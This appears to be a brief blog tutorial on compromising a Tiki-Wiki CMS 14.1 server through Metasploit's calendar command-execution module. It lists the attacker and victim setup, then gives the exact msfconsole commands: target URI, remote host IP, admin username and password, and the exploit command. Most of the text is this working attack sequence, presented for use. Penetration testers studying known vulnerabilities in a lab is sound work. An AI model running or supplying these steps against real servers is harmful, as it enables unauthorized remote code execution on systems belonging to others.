Exploit Remote Server using Tiki-Wiki CMS Calendar Command Execution


Exploit Targets
tiki-wiki 14.1

Requirement
Attacker: kali Linux
Victim PC: Linux,Windows


Open Kali terminal type msfconsole


msf exploit (tiki_calendar-exec)>set targeturi /tiki
msf exploit (tiki_calendar-exec)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (tiki_calendar-exec)>set username admin
msf exploit (tiki_calendar-exec)>set password raj123
msf exploit (tiki_calendar-exec)>exploit          

0 comments:

Post a Comment